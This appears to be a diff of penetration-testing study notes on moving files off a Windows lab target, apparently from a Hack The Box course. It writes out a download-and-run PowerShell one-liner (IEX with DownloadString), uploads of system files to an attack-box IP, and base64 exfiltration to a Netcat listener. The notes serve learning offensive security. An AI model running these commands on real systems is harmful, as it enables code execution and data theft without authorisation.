ma7moudShaaban/Penetration-Testing/Network/File Transfers/README.md

 1. First Approach
     - PowerShell doesn't have a built-in function for upload operations, but we can use Invoke-WebRequest or Invoke-RestMethod to build our upload function.
 We'll also need a web server that accepts uploads.
     - For our web server, we can use uploadserver, an extended module of the Python HTTP.server module, which includes a file upload page.
+    - **Steps**

-    - Installing a Configured WebServer with Upload: `sudo pip3 install uploadserver`
+        1. Installing a Configured WebServer with Upload: `sudo pip3 install uploadserver`
-    - Then, start the server `python3 -m uploadserver`
+        2. Then, start the server `python3 -m uploadserver`
-    - We can use a PowerShell script PSUpload.ps1 which uses `Invoke-RestMethod` to perform the upload operations.
+        3. We can use a PowerShell script PSUpload.ps1 which uses `Invoke-RestMethod` to perform the upload operations.
 The script accepts two parameters `-File`, which we use to specify the file path, and `-Uri`, the server URL where we'll upload our file.
-    - PowerShell Script to Upload a File to Python Upload Server
+        4. PowerShell Script to Upload a File to Python Upload Server
         ```
         PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
         PS C:\htb> Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts

         [+] File Uploaded:  C:\Windows\System32\drivers\etc\hosts
         [+] FileHash:  5E7241D66FD77E9E8EA866B6278B2373
         ```
 2. Second Approach **(PowerShell Base64 Web Upload)**
+    - **Steps**
         - Using Invoke-WebRequest or Invoke-RestMethod together with Netcat.
 We use Netcat to listen in on a port we specify and send the file as a POST request.
-    - Listen on our attack box `nc -lvnp 8000`
+        1. Listen on our attack box `nc -lvnp 8000`
-    - Copy the output and use the base64 decode function to convert the base64 string into a file.
+        2. Copy the output and use the base64 decode function to convert the base64 string into a file.
         ```
         PS C:\htb> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
         PS C:\htb> Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64
         ```

 #### SMB Uploads
 - Commonly enterprises don't allow the SMB protocol (TCP/445) out of their internal network because this can open them up to potential attacks.